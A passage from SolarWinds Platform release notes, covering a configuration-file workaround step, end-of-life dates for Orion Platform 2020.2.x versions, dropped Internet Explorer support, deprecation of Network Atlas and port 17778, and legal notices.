2.  Find INSTALL_PATH]\SWNetPerfMon.DB, for example in C:\Program Files (x86)\SolarWinds\Orion\SWNetPerfMon.DB, and open it for editing.
3.  Remove all empty lines from the bottom of the file and save your changes.
4.  Run the Configuration Wizard.

**End of life**

Return to top

For modules based on Orion Platform 2020.2.6 and earlier, SolarWinds is announcing future end-of-life plans for your convenience. As always, SolarWinds recommends you upgrade to the latest version of your products at your earliest convenience.

   

Version

EOL Announcements

EOE Effective Dates

EOL Effective Dates

2020.2.6

**April 18, 2023**: End-of-Life (EoL) announcement – Customers on Orion Platform 2020.2.6 should begin transitioning to the latest version of SolarWinds Platform.

**May 18, 2023**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for Orion Platform 2020.2.6 will no longer be actively supported by SolarWinds.

**May 18, 2024**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for Orion Platform 2020.2.6

2020.2.5

**January 18, 2023**: End-of-Life (EoL) announcement – Customers on Orion Platform 2020.2.5 should begin transitioning to the latest version of SolarWinds Platform.

**February 17, 2023**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for Orion Platform 2020.2.5 will no longer be actively supported by SolarWinds.

**February 17, 2024**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for Orion Platform 2020.2.5.

2020.2.4

**October 19, 2022**: End-of-Life (EoL) announcement – Customers on Orion Platform 2020.2.4 should begin transitioning to the latest version of SolarWinds Platform.

**November 18, 2022**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for Orion Platform 2020.2.4 will no longer be actively supported by SolarWinds.

**November 18, 2023**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for Orion Platform 2020.2.4.

2020.2.1

**October 19, 2022**: End-of-Life (EoL) announcement – Customers on Orion Platform 2020.2.1 should begin transitioning to the latest version of SolarWinds Platform.

**November 18, 2022**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for Orion Platform 2020.2.1 will no longer be actively supported by SolarWinds.

**November 18, 2023**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for Orion Platform 2020.2.1.

2020.2

**October 19, 2022**: End-of-Life (EoL) announcement – Customers on Orion Platform 2020.2 should begin transitioning to the latest version of SolarWinds Platform.

**November 18, 2022**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for Orion Platform 2020.2 will no longer be actively supported by SolarWinds.

**November 18, 2023**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for Orion Platform 2020.2.

See the End of Life Policy for information about SolarWinds product lifecycle phases. For supported versions and EoL announcements for all SolarWinds products, see Currently supported software versions.

**End of support**

Return to top

This version of SolarWinds Platform no longer supports the following platforms and features.

 

Type

Details

Browser support

All versions of Internet Explorer are no longer supported.

**Deprecation notices**

Return to top

This version of SolarWinds Platform deprecates the following platforms and features.

Deprecated platforms and features are still supported in the current release. However, they will be unsupported in a future release. Plan on upgrading deprecated platforms, and avoid using deprecated features. 

 

Type

Details

Network Atlas

Network Atlas is deprecated as of Orion Platform 2020.2. It is still available and supported in the current release, but will be removed in a future release. Deprecation is an indication that you should avoid expanded use of this feature and formulate a plan to discontinue using the feature. SolarWinds recommends that you start using SolarWinds Platform Maps in the SolarWinds Platform Web Console to display maps of physical and logical relationships between entities monitored by the SolarWinds Platform products you have installed.

Port 17778

SWIS REST Endpoint on port 17778 is deprecated as of 2023.1 and will be replaced with port 17774 in a future release. SolarWinds recommends that you start migrating SWIS REST Endpoint to port 17774.

**Legal notices**

Return to top

© 2023 SolarWinds Worldwide, LLC. All rights reserved.

This document may not be reproduced by any means nor modified, decompiled, disassembled, published or distributed, in whole or in part, or translated to any electronic medium or other means without the prior written consent of SolarWinds. All right, title, and interest in and to the software, services, and documentation are and shall remain the exclusive property of SolarWinds, its affiliates, and/or its respective licensors.

SOLARWINDS DISCLAIMS ALL WARRANTIES, CONDITIONS, OR OTHER TERMS, EXPRESS OR IMPLIED, STATUTORY OR OTHERWISE, ON THE DOCUMENTATION, INCLUDING WITHOUT LIMITATION NONINFRINGEMENT, ACCURACY, COMPLETENESS, OR USEFULNESS OF ANY INFORMATION CONTAINED HEREIN. IN NO EVENT SHALL SOLARWINDS, ITS SUPPLIERS, NOR ITS LICENSORS BE LIABLE FOR ANY DAMAGES, WHETHER ARISING IN TORT, CONTRACT OR ANY OTHER LEGAL THEORY, EVEN IF SOLARWINDS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

The SolarWinds, SolarWinds & Design, Orion, and THWACK trademarks are the exclusive property of SolarWinds Worldwide, LLC or its affiliates, are registered with the U.S. Patent and Trademark Office, and may be registered or pending registration in other countries. All other SolarWinds trademarks, service marks, and logos may be common law marks or are registered or pending registration. All other trademarks mentioned herein are used for identification purposes only and are trademarks of (and may be registered trademarks) of their respective companies.

Tag

#sql